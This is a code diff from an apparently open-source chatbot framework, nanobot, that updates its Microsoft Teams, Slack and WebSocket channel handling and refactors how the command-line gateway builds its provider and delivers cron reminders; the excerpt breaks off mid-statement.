@ -247,7 +247,6 @@ class MSTeamsChannel(BaseChannel):
|
||||
token = await self._get_access_token()
|
||||
base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities"
|
||||
use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id)
|
||||
url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url
|
||||
headers = {
|
||||
"Authorization": f"Bearer {token}",
|
||||
"Content-Type": "application/json",
|
||||
@ -260,7 +259,7 @@ class MSTeamsChannel(BaseChannel):
|
||||
payload["replyToId"] = ref.activity_id
|
||||
|
||||
try:
|
||||
resp = await self._http.post(url, headers=headers, json=payload)
|
||||
resp = await self._http.post(base_url, headers=headers, json=payload)
|
||||
resp.raise_for_status()
|
||||
logger.info("MSTeams message sent to {}", ref.conversation_id)
|
||||
self._touch_conversation_ref(str(msg.chat_id), persist=True)
|
||||
@ -340,10 +339,12 @@ class MSTeamsChannel(BaseChannel):
|
||||
"""Extract the user-authored text from a Teams activity."""
|
||||
text = str(activity.get("text") or "")
|
||||
text = self._strip_possible_bot_mention(text)
|
||||
text = self._normalize_html_whitespace(text)
|
||||
|
||||
channel_data = activity.get("channelData") or {}
|
||||
reply_to_id = str(activity.get("replyToId") or "").strip()
|
||||
normalized_preview = html.unescape(text).replace("&rsquo", "’").strip()
|
||||
normalized_preview = normalized_preview.replace("\xa0", " ")
|
||||
normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n")
|
||||
preview_lines = [line.strip() for line in normalized_preview.split("\n")]
|
||||
while preview_lines and not preview_lines[0]:
|
||||
@ -363,9 +364,15 @@ class MSTeamsChannel(BaseChannel):
|
||||
cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned)
|
||||
return cleaned.strip()
|
||||
|
||||
def _normalize_html_whitespace(self, text: str) -> str:
|
||||
"""Normalize common HTML whitespace/entities from Teams into plain text spacing."""
|
||||
normalized = html.unescape(text).replace("&rsquo", "’")
|
||||
normalized = normalized.replace("\xa0", " ")
|
||||
return normalized
|
||||
|
||||
def _normalize_teams_reply_quote(self, text: str) -> str:
|
||||
"""Normalize Teams quoted replies into a compact structured form."""
|
||||
cleaned = html.unescape(text).replace("&rsquo", "’").strip()
|
||||
cleaned = self._normalize_html_whitespace(text).strip()
|
||||
if not cleaned:
|
||||
return ""
|
||||
|
||||
|
||||
@ -2,8 +2,10 @@
|
||||
|
||||
import asyncio
|
||||
import re
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
from loguru import logger
|
||||
from pydantic import Field
|
||||
from slack_sdk.socket_mode.request import SocketModeRequest
|
||||
@ -15,7 +17,9 @@ from slackify_markdown import slackify_markdown
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.base import BaseChannel
|
||||
from nanobot.config.paths import get_media_dir
|
||||
from nanobot.config.schema import Base
|
||||
from nanobot.utils.helpers import safe_filename, split_message
|
||||
|
||||
|
||||
class SlackDMConfig(Base):
|
||||
@ -38,12 +42,19 @@ class SlackConfig(Base):
|
||||
reply_in_thread: bool = True
|
||||
react_emoji: str = "eyes"
|
||||
done_emoji: str = "white_check_mark"
|
||||
include_thread_context: bool = True
|
||||
thread_context_limit: int = 20
|
||||
allow_from: list[str] = Field(default_factory=list)
|
||||
group_policy: str = "mention"
|
||||
group_allow_from: list[str] = Field(default_factory=list)
|
||||
dm: SlackDMConfig = Field(default_factory=SlackDMConfig)
|
||||
|
||||
|
||||
SLACK_MAX_MESSAGE_LEN = 39_000 # Slack API allows ~40k; leave margin
|
||||
SLACK_DOWNLOAD_TIMEOUT = 30.0
|
||||
_HTML_DOWNLOAD_PREFIXES = (b"<!doctype html", b"<html")
|
||||
|
||||
|
||||
class SlackChannel(BaseChannel):
|
||||
"""Slack channel using Socket Mode."""
|
||||
|
||||
@ -57,6 +68,8 @@ class SlackChannel(BaseChannel):
|
||||
def default_config(cls) -> dict[str, Any]:
|
||||
return SlackConfig().model_dump(by_alias=True)
|
||||
|
||||
_THREAD_CONTEXT_CACHE_LIMIT = 10_000
|
||||
|
||||
def __init__(self, config: Any, bus: MessageBus):
|
||||
if isinstance(config, dict):
|
||||
config = SlackConfig.model_validate(config)
|
||||
@ -66,6 +79,7 @@ class SlackChannel(BaseChannel):
|
||||
self._socket_client: SocketModeClient | None = None
|
||||
self._bot_user_id: str | None = None
|
||||
self._target_cache: dict[str, str] = {}
|
||||
self._thread_context_attempted: set[str] = set()
|
||||
|
||||
async def start(self) -> None:
|
||||
"""Start the Slack Socket Mode client."""
|
||||
@ -128,14 +142,17 @@ class SlackChannel(BaseChannel):
|
||||
else None
|
||||
)
|
||||
|
||||
# Slack rejects empty text payloads. Keep media-only messages media-only,
|
||||
# but send a single blank message when the bot has no text or files to send.
|
||||
if msg.content or not (msg.media or []):
|
||||
await self._web_client.chat_postMessage(
|
||||
channel=target_chat_id,
|
||||
text=self._to_mrkdwn(msg.content) if msg.content else " ",
|
||||
thread_ts=thread_ts_param,
|
||||
)
|
||||
mrkdwn = self._to_mrkdwn(msg.content) if msg.content else " "
|
||||
buttons = getattr(msg, "buttons", None) or []
|
||||
chunks = split_message(mrkdwn, SLACK_MAX_MESSAGE_LEN)
|
||||
for index, chunk in enumerate(chunks):
|
||||
kwargs: dict[str, Any] = dict(
|
||||
channel=target_chat_id, text=chunk, thread_ts=thread_ts_param,
|
||||
)
|
||||
if buttons and index == len(chunks) - 1:
|
||||
kwargs["blocks"] = self._build_button_blocks(chunk, buttons)
|
||||
await self._web_client.chat_postMessage(**kwargs)
|
||||
|
||||
for media_path in msg.media or []:
|
||||
try:
|
||||
@ -273,6 +290,9 @@ class SlackChannel(BaseChannel):
|
||||
req: SocketModeRequest,
|
||||
) -> None:
|
||||
"""Handle incoming Socket Mode requests."""
|
||||
if req.type == "interactive":
|
||||
await self._on_block_action(client, req)
|
||||
return
|
||||
if req.type != "events_api":
|
||||
return
|
||||
|
||||
@ -292,8 +312,10 @@ class SlackChannel(BaseChannel):
|
||||
sender_id = event.get("user")
|
||||
chat_id = event.get("channel")
|
||||
|
||||
# Ignore bot/system messages (any subtype = not a normal user message)
|
||||
if event.get("subtype"):
|
||||
subtype = event.get("subtype")
|
||||
# Slack uses subtype=file_share for user messages with attachments.
|
||||
# Ignore other subtypes such as bot_message / message_changed / deleted.
|
||||
if subtype and subtype != "file_share":
|
||||
return
|
||||
if self._bot_user_id and sender_id == self._bot_user_id:
|
||||
return
|
||||
@ -308,7 +330,7 @@ class SlackChannel(BaseChannel):
|
||||
logger.debug(
|
||||
"Slack event: type={} subtype={} user={} channel={} channel_type={} text={}",
|
||||
event_type,
|
||||
event.get("subtype"),
|
||||
subtype,
|
||||
sender_id,
|
||||
chat_id,
|
||||
event.get("channel_type"),
|
||||
@ -327,9 +349,11 @@ class SlackChannel(BaseChannel):
|
||||
|
||||
text = self._strip_bot_mention(text)
|
||||
|
||||
thread_ts = event.get("thread_ts")
|
||||
event_ts = event.get("ts")
|
||||
raw_thread_ts = event.get("thread_ts")
|
||||
thread_ts = raw_thread_ts
|
||||
if self.config.reply_in_thread and not thread_ts:
|
||||
thread_ts = event.get("ts")
|
||||
thread_ts = event_ts
|
||||
# Add :eyes: reaction to the triggering message (best-effort)
|
||||
try:
|
||||
if self._web_client and event.get("ts"):
|
||||
@ -343,12 +367,37 @@ class SlackChannel(BaseChannel):
|
||||
|
||||
# Thread-scoped session key for channel/group messages
|
||||
session_key = f"slack:{chat_id}:{thread_ts}" if thread_ts and channel_type != "im" else None
|
||||
media_paths: list[str] = []
|
||||
file_markers: list[str] = []
|
||||
for file_info in event.get("files") or []:
|
||||
if not isinstance(file_info, dict):
|
||||
continue
|
||||
file_path, marker = await self._download_slack_file(file_info)
|
||||
if file_path:
|
||||
media_paths.append(file_path)
|
||||
if marker:
|
||||
file_markers.append(marker)
|
||||
|
||||
is_slash = text.strip().startswith("/")
|
||||
content = text if is_slash else await self._with_thread_context(
|
||||
text,
|
||||
chat_id=chat_id,
|
||||
channel_type=channel_type,
|
||||
thread_ts=thread_ts,
|
||||
raw_thread_ts=raw_thread_ts,
|
||||
current_ts=event_ts,
|
||||
)
|
||||
if file_markers:
|
||||
content = "\n".join(part for part in [content, *file_markers] if part)
|
||||
if not content and not media_paths:
|
||||
return
|
||||
|
||||
try:
|
||||
await self._handle_message(
|
||||
sender_id=sender_id,
|
||||
chat_id=chat_id,
|
||||
content=text,
|
||||
content=content,
|
||||
media=media_paths,
|
||||
metadata={
|
||||
"slack": {
|
||||
"event": event,
|
||||
@ -361,6 +410,163 @@ class SlackChannel(BaseChannel):
|
||||
except Exception:
|
||||
logger.exception("Error handling Slack message from {}", sender_id)
|
||||
|
||||
async def _download_slack_file(self, file_info: dict[str, Any]) -> tuple[str | None, str]:
|
||||
"""Download a Slack private file to the local media directory."""
|
||||
file_id = str(file_info.get("id") or "file")
|
||||
name = str(
|
||||
file_info.get("name")
|
||||
or file_info.get("title")
|
||||
or file_info.get("id")
|
||||
or "slack-file"
|
||||
)
|
||||
marker_type = "image" if str(file_info.get("mimetype") or "").startswith("image/") else "file"
|
||||
marker = f"[{marker_type}: {name}]"
|
||||
url = str(file_info.get("url_private_download") or file_info.get("url_private") or "")
|
||||
if not url:
|
||||
return None, f"[{marker_type}: {name}: missing download url]"
|
||||
if not self.config.bot_token:
|
||||
return None, f"[{marker_type}: {name}: missing bot token]"
|
||||
|
||||
filename = safe_filename(f"{file_id}_{name}")
|
||||
path = Path(get_media_dir("slack")) / filename
|
||||
try:
|
||||
async with httpx.AsyncClient(timeout=SLACK_DOWNLOAD_TIMEOUT, follow_redirects=True) as client:
|
||||
response = await client.get(
|
||||
url,
|
||||
headers={"Authorization": f"Bearer {self.config.bot_token}"},
|
||||
)
|
||||
response.raise_for_status()
|
||||
if self._looks_like_html_download(response):
|
||||
raise ValueError("Slack returned HTML instead of file content")
|
||||
path.write_bytes(response.content)
|
||||
return str(path), marker
|
||||
except Exception as e:
|
||||
logger.warning("Failed to download Slack file {}: {}", file_id, e)
|
||||
return None, f"[{marker_type}: {name}: download failed]"
|
||||
|
||||
@staticmethod
|
||||
def _looks_like_html_download(response: httpx.Response) -> bool:
|
||||
content_type = response.headers.get("content-type", "").lower()
|
||||
if "text/html" in content_type:
|
||||
return True
|
||||
preview = response.content[:256].lstrip().lower()
|
||||
return preview.startswith(_HTML_DOWNLOAD_PREFIXES)
|
||||
|
||||
async def _on_block_action(self, client: SocketModeClient, req: SocketModeRequest) -> None:
|
||||
"""Handle button clicks from ask_user blocks."""
|
||||
await client.send_socket_mode_response(SocketModeResponse(envelope_id=req.envelope_id))
|
||||
payload = req.payload or {}
|
||||
actions = payload.get("actions") or []
|
||||
if not actions:
|
||||
return
|
||||
value = str(actions[0].get("value") or "")
|
||||
user_info = payload.get("user") or {}
|
||||
sender_id = str(user_info.get("id") or "")
|
||||
channel_info = payload.get("channel") or {}
|
||||
chat_id = str(channel_info.get("id") or "")
|
||||
if not sender_id or not chat_id or not value:
|
||||
return
|
||||
message_info = payload.get("message") or {}
|
||||
thread_ts = message_info.get("thread_ts") or message_info.get("ts")
|
||||
channel_type = self._infer_channel_type(chat_id)
|
||||
if not self._is_allowed(sender_id, chat_id, channel_type):
|
||||
return
|
||||
session_key = f"slack:{chat_id}:{thread_ts}" if thread_ts else None
|
||||
try:
|
||||
await self._handle_message(
|
||||
sender_id=sender_id,
|
||||
chat_id=chat_id,
|
||||
content=value,
|
||||
metadata={"slack": {"thread_ts": thread_ts, "channel_type": channel_type}},
|
||||
session_key=session_key,
|
||||
)
|
||||
except Exception:
|
||||
logger.exception("Error handling Slack button click from {}", sender_id)
|
||||
|
||||
async def _with_thread_context(
|
||||
self,
|
||||
text: str,
|
||||
*,
|
||||
chat_id: str,
|
||||
channel_type: str,
|
||||
thread_ts: str | None,
|
||||
raw_thread_ts: str | None,
|
||||
current_ts: str | None,
|
||||
) -> str:
|
||||
"""Include thread history the first time the bot is pulled into a Slack thread."""
|
||||
if (
|
||||
not self.config.include_thread_context
|
||||
or not self._web_client
|
||||
or channel_type == "im"
|
||||
or not raw_thread_ts
|
||||
or not thread_ts
|
||||
or current_ts == thread_ts
|
||||
):
|
||||
return text
|
||||
|
||||
key = f"{chat_id}:{thread_ts}"
|
||||
if key in self._thread_context_attempted:
|
||||
return text
|
||||
if len(self._thread_context_attempted) >= self._THREAD_CONTEXT_CACHE_LIMIT:
|
||||
self._thread_context_attempted.clear()
|
||||
self._thread_context_attempted.add(key)
|
||||
|
||||
try:
|
||||
response = await self._web_client.conversations_replies(
|
||||
channel=chat_id,
|
||||
ts=thread_ts,
|
||||
limit=max(1, self.config.thread_context_limit),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.warning("Slack thread context unavailable for {}: {}", key, e)
|
||||
return text
|
||||
|
||||
lines = self._format_thread_context(
|
||||
response.get("messages", []),
|
||||
current_ts=current_ts,
|
||||
)
|
||||
if not lines:
|
||||
return text
|
||||
return "Slack thread context before this mention:\n" + "\n".join(lines) + f"\n\nCurrent message:\n{text}"
|
||||
|
||||
def _format_thread_context(self, messages: list[dict[str, Any]], *, current_ts: str | None) -> list[str]:
|
||||
lines: list[str] = []
|
||||
for item in messages:
|
||||
if item.get("ts") == current_ts:
|
||||
continue
|
||||
if item.get("subtype"):
|
||||
continue
|
||||
sender = str(item.get("user") or item.get("bot_id") or "unknown")
|
||||
is_bot = self._bot_user_id is not None and sender == self._bot_user_id
|
||||
label = "bot" if is_bot else f"<@{sender}>"
|
||||
text = str(item.get("text") or "").strip()
|
||||
if not text:
|
||||
continue
|
||||
text = self._strip_bot_mention(text)
|
||||
if len(text) > 500:
|
||||
text = text[:500] + "…"
|
||||
lines.append(f"- {label}: {text}")
|
||||
return lines
|
||||
|
||||
@staticmethod
|
||||
def _build_button_blocks(text: str, buttons: list[list[str]]) -> list[dict[str, Any]]:
|
||||
"""Build Slack Block Kit blocks with action buttons for ask_user choices."""
|
||||
blocks: list[dict[str, Any]] = [
|
||||
{"type": "section", "text": {"type": "mrkdwn", "text": text[:3000]}},
|
||||
]
|
||||
elements = []
|
||||
for row in buttons:
|
||||
for label in row:
|
||||
elements.append({
|
||||
"type": "button",
|
||||
"text": {"type": "plain_text", "text": label[:75]},
|
||||
"value": label[:75],
|
||||
"action_id": f"ask_user_{label[:50]}",
|
||||
})
|
||||
if elements:
|
||||
blocks.append({"type": "actions", "elements": elements[:25]})
|
||||
return blocks
|
||||
|
||||
async def _update_react_emoji(self, chat_id: str, ts: str | None) -> None:
|
||||
"""Remove the in-progress reaction and optionally add a done reaction."""
|
||||
if not self._web_client or not ts:
|
||||
@ -407,6 +613,19 @@ class SlackChannel(BaseChannel):
|
||||
return chat_id in self.config.group_allow_from
|
||||
return False
|
||||
|
||||
def is_allowed(self, sender_id: str) -> bool:
|
||||
# Slack needs channel-aware policy checks, so _on_socket_request and
|
||||
# _on_block_action call _is_allowed before handing off to BaseChannel.
|
||||
return True
|
||||
|
||||
@staticmethod
|
||||
def _infer_channel_type(chat_id: str) -> str:
|
||||
if chat_id.startswith("D"):
|
||||
return "im"
|
||||
if chat_id.startswith("G"):
|
||||
return "group"
|
||||
return "channel"
|
||||
|
||||
def _strip_bot_mention(self, text: str) -> str:
|
||||
if not text or not self._bot_user_id:
|
||||
return text
|
||||
|
||||
@ -54,6 +54,14 @@ def _normalize_config_path(path: str) -> str:
|
||||
return _strip_trailing_slash(path)
|
||||
|
||||
|
||||
def _append_buttons_as_text(text: str, buttons: list[list[str]]) -> str:
|
||||
labels = [label for row in buttons for label in row if label]
|
||||
if not labels:
|
||||
return text
|
||||
fallback = "\n".join(f"{index}. {label}" for index, label in enumerate(labels, 1))
|
||||
return f"{text}\n\n{fallback}" if text else fallback
|
||||
|
||||
|
||||
class WebSocketConfig(Base):
|
||||
"""WebSocket server channel configuration.
|
||||
|
||||
@ -531,6 +539,12 @@ class WebSocketChannel(BaseChannel):
|
||||
if got == "/api/sessions":
|
||||
return self._handle_sessions_list(request)
|
||||
|
||||
if got == "/api/settings":
|
||||
return self._handle_settings(request)
|
||||
|
||||
if got == "/api/settings/update":
|
||||
return self._handle_settings_update(request)
|
||||
|
||||
m = re.match(r"^/api/sessions/([^/]+)/messages$", got)
|
||||
if m:
|
||||
return self._handle_session_messages(request, m.group(1))
|
||||
@ -639,6 +653,75 @@ class WebSocketChannel(BaseChannel):
|
||||
]
|
||||
return _http_json_response({"sessions": cleaned})
|
||||
|
||||
def _settings_payload(self, *, requires_restart: bool = False) -> dict[str, Any]:
|
||||
from nanobot.config.loader import get_config_path, load_config
|
||||
from nanobot.providers.registry import PROVIDERS, find_by_name
|
||||
|
||||
config = load_config()
|
||||
defaults = config.agents.defaults
|
||||
provider_name = config.get_provider_name(defaults.model) or defaults.provider
|
||||
provider = config.get_provider(defaults.model)
|
||||
selected_provider = provider_name
|
||||
if defaults.provider != "auto":
|
||||
spec = find_by_name(defaults.provider)
|
||||
selected_provider = spec.name if spec else provider_name
|
||||
return {
|
||||
"agent": {
|
||||
"model": defaults.model,
|
||||
"provider": selected_provider,
|
||||
"resolved_provider": provider_name,
|
||||
"has_api_key": bool(provider and provider.api_key),
|
||||
},
|
||||
"providers": [
|
||||
{"name": "auto", "label": "Auto"}
|
||||
] + [
|
||||
{"name": spec.name, "label": spec.label}
|
||||
for spec in PROVIDERS
|
||||
],
|
||||
"runtime": {
|
||||
"config_path": str(get_config_path().expanduser()),
|
||||
},
|
||||
"requires_restart": requires_restart,
|
||||
}
|
||||
|
||||
def _handle_settings(self, request: WsRequest) -> Response:
|
||||
if not self._check_api_token(request):
|
||||
return _http_error(401, "Unauthorized")
|
||||
return _http_json_response(self._settings_payload())
|
||||
|
||||
def _handle_settings_update(self, request: WsRequest) -> Response:
|
||||
if not self._check_api_token(request):
|
||||
return _http_error(401, "Unauthorized")
|
||||
from nanobot.config.loader import load_config, save_config
|
||||
from nanobot.providers.registry import find_by_name
|
||||
|
||||
query = _parse_query(request.path)
|
||||
config = load_config()
|
||||
defaults = config.agents.defaults
|
||||
changed = False
|
||||
|
||||
model = _query_first(query, "model")
|
||||
if model is not None:
|
||||
model = model.strip()
|
||||
if not model:
|
||||
return _http_error(400, "model is required")
|
||||
if defaults.model != model:
|
||||
defaults.model = model
|
||||
changed = True
|
||||
|
||||
provider = _query_first(query, "provider")
|
||||
if provider is not None:
|
||||
provider = provider.strip() or "auto"
|
||||
if provider != "auto" and find_by_name(provider) is None:
|
||||
return _http_error(400, "unknown provider")
|
||||
if defaults.provider != provider:
|
||||
defaults.provider = provider
|
||||
changed = True
|
||||
|
||||
if changed:
|
||||
save_config(config)
|
||||
return _http_json_response(self._settings_payload(requires_restart=changed))
|
||||
|
||||
@staticmethod
|
||||
def _is_webui_session_key(key: str) -> bool:
|
||||
"""Return True when *key* belongs to the webui's websocket-only surface."""
|
||||
@ -1146,11 +1229,17 @@ class WebSocketChannel(BaseChannel):
|
||||
if not conns:
|
||||
logger.warning("websocket: no active subscribers for chat_id={}", msg.chat_id)
|
||||
return
|
||||
text = msg.content
|
||||
if msg.buttons:
|
||||
text = _append_buttons_as_text(text, msg.buttons)
|
||||
payload: dict[str, Any] = {
|
||||
"event": "message",
|
||||
"chat_id": msg.chat_id,
|
||||
"text": msg.content,
|
||||
"text": text,
|
||||
}
|
||||
if msg.buttons:
|
||||
payload["buttons"] = msg.buttons
|
||||
payload["button_prompt"] = msg.content
|
||||
if msg.media:
|
||||
payload["media"] = msg.media
|
||||
urls: list[dict[str, str]] = []
|
||||
|
||||
@ -212,12 +212,16 @@ async def _print_interactive_response(
|
||||
|
||||
def _print_cli_progress_line(text: str, thinking: ThinkingSpinner | None) -> None:
|
||||
"""Print a CLI progress line, pausing the spinner if needed."""
|
||||
if not text.strip():
|
||||
return
|
||||
with thinking.pause() if thinking else nullcontext():
|
||||
console.print(f" [dim]↳ {text}[/dim]")
|
||||
|
||||
|
||||
async def _print_interactive_progress_line(text: str, thinking: ThinkingSpinner | None) -> None:
|
||||
"""Print an interactive progress line, pausing the spinner if needed."""
|
||||
if not text.strip():
|
||||
return
|
||||
with thinking.pause() if thinking else nullcontext():
|
||||
await _print_interactive_line(text)
|
||||
|
||||
@ -408,73 +412,13 @@ def _make_provider(config: Config):
|
||||
|
||||
Routing is driven by ``ProviderSpec.backend`` in the registry.
|
||||
"""
|
||||
from nanobot.providers.base import GenerationSettings
|
||||
from nanobot.providers.registry import find_by_name
|
||||
from nanobot.providers.factory import make_provider
|
||||
|
||||
model = config.agents.defaults.model
|
||||
provider_name = config.get_provider_name(model)
|
||||
p = config.get_provider(model)
|
||||
spec = find_by_name(provider_name) if provider_name else None
|
||||
backend = spec.backend if spec else "openai_compat"
|
||||
|
||||
# --- validation ---
|
||||
if backend == "azure_openai":
|
||||
if not p or not p.api_key or not p.api_base:
|
||||
console.print("[red]Error: Azure OpenAI requires api_key and api_base.[/red]")
|
||||
console.print("Set them in ~/.nanobot/config.json under providers.azure_openai section")
|
||||
console.print("Use the model field to specify the deployment name.")
|
||||
raise typer.Exit(1)
|
||||
elif backend == "openai_compat" and not model.startswith("bedrock/"):
|
||||
needs_key = not (p and p.api_key)
|
||||
exempt = spec and (spec.is_oauth or spec.is_local or spec.is_direct)
|
||||
if needs_key and not exempt:
|
||||
console.print("[red]Error: No API key configured.[/red]")
|
||||
console.print("Set one in ~/.nanobot/config.json under providers section")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# --- instantiation by backend ---
|
||||
if backend == "openai_codex":
|
||||
from nanobot.providers.openai_codex_provider import OpenAICodexProvider
|
||||
|
||||
provider = OpenAICodexProvider(default_model=model)
|
||||
elif backend == "azure_openai":
|
||||
from nanobot.providers.azure_openai_provider import AzureOpenAIProvider
|
||||
|
||||
provider = AzureOpenAIProvider(
|
||||
api_key=p.api_key,
|
||||
api_base=p.api_base,
|
||||
default_model=model,
|
||||
)
|
||||
elif backend == "github_copilot":
|
||||
from nanobot.providers.github_copilot_provider import GitHubCopilotProvider
|
||||
provider = GitHubCopilotProvider(default_model=model)
|
||||
elif backend == "anthropic":
|
||||
from nanobot.providers.anthropic_provider import AnthropicProvider
|
||||
|
||||
provider = AnthropicProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
)
|
||||
else:
|
||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||
|
||||
provider = OpenAICompatProvider(
|
||||
api_key=p.api_key if p else None,
|
||||
api_base=config.get_api_base(model),
|
||||
default_model=model,
|
||||
extra_headers=p.extra_headers if p else None,
|
||||
spec=spec,
|
||||
)
|
||||
|
||||
defaults = config.agents.defaults
|
||||
provider.generation = GenerationSettings(
|
||||
temperature=defaults.temperature,
|
||||
max_tokens=defaults.max_tokens,
|
||||
reasoning_effort=defaults.reasoning_effort,
|
||||
)
|
||||
return provider
|
||||
try:
|
||||
return make_provider(config)
|
||||
except ValueError as exc:
|
||||
console.print(f"[red]Error: {exc}[/red]")
|
||||
raise typer.Exit(1) from exc
|
||||
|
||||
|
||||
def _load_runtime_config(config: str | None = None, workspace: str | None = None) -> Config:
|
||||
@ -593,6 +537,7 @@ def serve(
|
||||
unified_session=runtime_config.agents.defaults.unified_session,
|
||||
disabled_skills=runtime_config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio,
|
||||
tools_config=runtime_config.tools,
|
||||
)
|
||||
|
||||
@ -652,11 +597,14 @@ def _run_gateway(
|
||||
) -> None:
|
||||
"""Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up."""
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.agent.tools.cron import CronTool
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.manager import ChannelManager
|
||||
from nanobot.cron.service import CronService
|
||||
from nanobot.cron.types import CronJob
|
||||
from nanobot.heartbeat.service import HeartbeatService
|
||||
from nanobot.providers.factory import build_provider_snapshot, load_provider_snapshot
|
||||
from nanobot.session.manager import SessionManager
|
||||
|
||||
port = port if port is not None else config.gateway.port
|
||||
@ -664,7 +612,12 @@ def _run_gateway(
|
||||
console.print(f"{__logo__} Starting nanobot gateway version {__version__} on port {port}...")
|
||||
sync_workspace_templates(config.workspace_path)
|
||||
bus = MessageBus()
|
||||
provider = _make_provider(config)
|
||||
try:
|
||||
provider_snapshot = build_provider_snapshot(config)
|
||||
except ValueError as exc:
|
||||
console.print(f"[red]Error: {exc}[/red]")
|
||||
raise typer.Exit(1) from exc
|
||||
provider = provider_snapshot.provider
|
||||
session_manager = SessionManager(config.workspace_path)
|
||||
|
||||
# Preserve existing single-workspace installs, but keep custom workspaces clean.
|
||||
@ -680,9 +633,9 @@ def _run_gateway(
|
||||
bus=bus,
|
||||
provider=provider,
|
||||
workspace=config.workspace_path,
|
||||
model=config.agents.defaults.model,
|
||||
model=provider_snapshot.model,
|
||||
max_iterations=config.agents.defaults.max_tool_iterations,
|
||||
context_window_tokens=config.agents.defaults.context_window_tokens,
|
||||
context_window_tokens=provider_snapshot.context_window_tokens,
|
||||
web_config=config.tools.web,
|
||||
context_block_limit=config.agents.defaults.context_block_limit,
|
||||
max_tool_result_chars=config.agents.defaults.max_tool_result_chars,
|
||||
@ -697,9 +650,55 @@ def _run_gateway(
|
||||
unified_session=config.agents.defaults.unified_session,
|
||||
disabled_skills=config.agents.defaults.disabled_skills,
|
||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||
tools_config=config.tools,
|
||||
provider_snapshot_loader=load_provider_snapshot,
|
||||
provider_signature=provider_snapshot.signature,
|
||||
)
|
||||
|
||||
from nanobot.agent.loop import UNIFIED_SESSION_KEY
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
|
||||
def _channel_session_key(channel: str, chat_id: str) -> str:
|
||||
return (
|
||||
UNIFIED_SESSION_KEY
|
||||
if config.agents.defaults.unified_session
|
||||
else f"{channel}:{chat_id}"
|
||||
)
|
||||
|
||||
async def _deliver_to_channel(
|
||||
msg: OutboundMessage, *, record: bool = False, session_key: str | None = None,
|
||||
) -> None:
|
||||
"""Publish a user-visible message and mirror it into that channel's session."""
|
||||
metadata = dict(msg.metadata or {})
|
||||
record = record or bool(metadata.pop("_record_channel_delivery", False))
|
||||
if metadata != (msg.metadata or {}):
|
||||
msg = OutboundMessage(
|
||||
channel=msg.channel,
|
||||
chat_id=msg.chat_id,
|
||||
content=msg.content,
|
||||
reply_to=msg.reply_to,
|
||||
media=msg.media,
|
||||
metadata=metadata,
|
||||
buttons=msg.buttons,
|
||||
)
|
||||
if (
|
||||
record
|
||||
and msg.channel != "cli"
|
||||
and msg.content.strip()
|
||||
and hasattr(session_manager, "get_or_create")
|
||||
and hasattr(session_manager, "save")
|
||||
):
|
||||
key = session_key or _channel_session_key(msg.channel, msg.chat_id)
|
||||
session = session_manager.get_or_create(key)
|
||||
session.add_message("assistant", msg.content, _channel_delivery=True)
|
||||
session_manager.save(session)
|
||||
await bus.publish_outbound(msg)
|
||||
|
||||
message_tool = getattr(agent, "tools", {}).get("message")
|
||||
if isinstance(message_tool, MessageTool):
|
||||
message_tool.set_send_callback(_deliver_to_channel)
|
||||
|
||||
# Set cron callback (needs agent)
|
||||
async def on_cron_job(job: CronJob) -> str | None:
|
||||
"""Execute a cron job through the agent."""
|
||||
@ -712,14 +711,14 @@ def _run_gateway(
|
||||
logger.exception("Dream cron job failed")
|
||||
return None
|
||||
|
||||
from nanobot.agent.tools.cron import CronTool
|
||||
from nanobot.agent.tools.message import MessageTool
|
||||
from nanobot.utils.evaluator import evaluate_response
|
||||
|
||||
reminder_note = (
|
||||
"[Scheduled Task] Timer finished.\n\n"
|
||||
f"Task '{job.name}' has been triggered.\n"
|
||||
f"Scheduled instruction: {job.payload.message}"
|
||||
"The scheduled time has arrived. Deliver this reminder to the user now, "
|
||||
"as a brief and natural message in their language. Speak directly to them — "
|
||||
"do not narrate progress, summarize, include user IDs, or add status reports "
|
||||
"like 'Done' or 'Reminded'.\n\n"
|
||||
f"Reminder: {job.payload.message}"
|
||||
)
|
||||
|
||||
cron_tool = agent.tools.get("cron")
|
||||
@ -730,6 +729,10 @@ def _run_gateway(
|
||||
async def _silent(*_args, **_kwargs):
|
||||
pass
|
||||
|
||||
message_record_token = None
|
||||
if isinstance(message_tool, MessageTool):
|
||||
message_record_token = message_tool.set_record_channel_delivery(True)
|
||||
|
||||
try:
|
||||
resp = await agent.process_direct(
|
||||
reminder_note,
|
||||
@ -741,10 +744,11 @@ def _run_gateway(
|
||||
finally:
|
||||
if isinstance(cron_tool, CronTool) and cron_token is not None:
|
||||
cron_tool.reset_cron_context(cron_token)
|
||||
if isinstance(message_tool, MessageTool) and message_record_token is not None:
|
||||
message_tool.reset_record_channel_delivery(message_record_token)
|
||||
|
||||
response = resp.content if resp else ""
|
||||
|
||||
message_tool = agent.tools.get("message")
|
||||
if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn:
|
||||
return response
|
||||
|
||||
@ -753,12 +757,16 @@ def _run_gateway(
|
||||
response, reminder_note, provider, agent.model,
|
||||
)
|
||||
if should_notify:
|
||||
from nanobot.bus.events import OutboundMessage
|
||||
await bus.publish_outbound(OutboundMessage(
|
||||
channel=job.payload.channel or "cli",
|
||||
chat_id=job.payload.to,
|
||||
content=response,
|
||||
))
|
||||
await _deliver_to_channel(
|
||||
